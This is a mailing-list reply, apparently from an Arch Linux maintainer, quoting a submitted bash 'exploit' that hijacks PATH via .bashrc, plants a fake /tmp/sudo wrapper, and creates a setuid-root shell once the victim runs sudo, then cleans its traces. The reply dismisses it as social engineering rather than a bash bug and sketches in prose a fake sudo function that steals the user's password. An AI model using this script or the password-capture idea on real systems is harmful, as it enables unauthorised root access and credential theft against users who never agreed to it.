On 4/12/19 5:38 PM, bakzero wrote:
> Hi,
> I written an exploit which allow to became root when a normal user use sudo.
> The following code add to the .bashrc configuration file the /tmp path. Then
> when the user exec sudo he runs the fake one, giving you a root shell. Just
> run it, when the normal user will use sudo you will get a root shell.
>
> chmod +x ./exploit.sh && ./exploit.sh
>
> #!/bin/bash
>
> PAYLOAD="/bin/bash"
> CFILE=".temp0000"
> PRIV="root"
> COLOR='\033[1;31m'
>
> echo -e "$COLOR"
>
> echo -e "\n - Adding /tmp path on $HOME/.bashrc"; sleep 1
> echo export PATH=/tmp:$PATH >> $HOME/.bashrc
> echo -e " - Creating C executable with setuid 0 "
> sleep 1
> echo "#include <stdlib.h>" >/tmp/$CFILE.c
> echo "int main(void) {" >>/tmp/$CFILE.c
> echo "setuid(0);" >>/tmp/$CFILE.c
> echo "system(\"$PAYLOAD\"); }" >>/tmp/$CFILE.c
> /usr/bin/gcc /tmp/$CFILE.c -o /tmp/$CFILE &> /dev/null
> rm -rf /tmp/$CFILE.c
> echo -e " - Creating sudo script which will be executed by the victim ";
> sleep 1
> echo "#!/bin/bash" > /tmp/sudo
> echo "/usr/bin/sudo chown root:root /tmp/$CFILE && /usr/bin/sudo chmod 4755
> /tmp/$CFILE" >> /tmp/sudo
> echo "/usr/bin/sudo \$1 \$2 \$3 \$4 \$5" >>/tmp/sudo && chmod +x /tmp/sudo
> echo " - Wait while the victim open a shell and execute sudo"
> while [[ $(stat -c '%U' /tmp/$CFILE) != $PRIV ]] ;
> do
> sleep 1
> done
> echo -e " - Root shell with SETUID 0 created on $CFILE"; sleep 1
> echo -e " - Cleaning sudo script and path line\n"; sleep 1
> sed -i -e '/^export PATH/d' $HOME/.bashrc
> rm -rf /tmp/sudo
> /tmp/$CFILE
>
> Impact
>
> An attacker logged into a system as normal user, using a sudo weakness, can
> escalate to rootThat's not a bug in bash, and it's not even a bug. Tricking the user into running arbitrary code is the oldest trick in the book. A much more subtle trick would be to add $HOME/.local/share/bash-completion/completions/sudo and define a sudo function that prompts for the password, writes it to wherever you want, echoes a message pretending that you mistyped the password, and calls the original command again after undefining itself and doing cleanup. But that still isn't a bug in bash. It's more along the lines of a social engineering exploit. -- Eli Schwartz Arch Linux Bug Wrangler and Trusted User
signature.asc
Description: OpenPGP digital signature
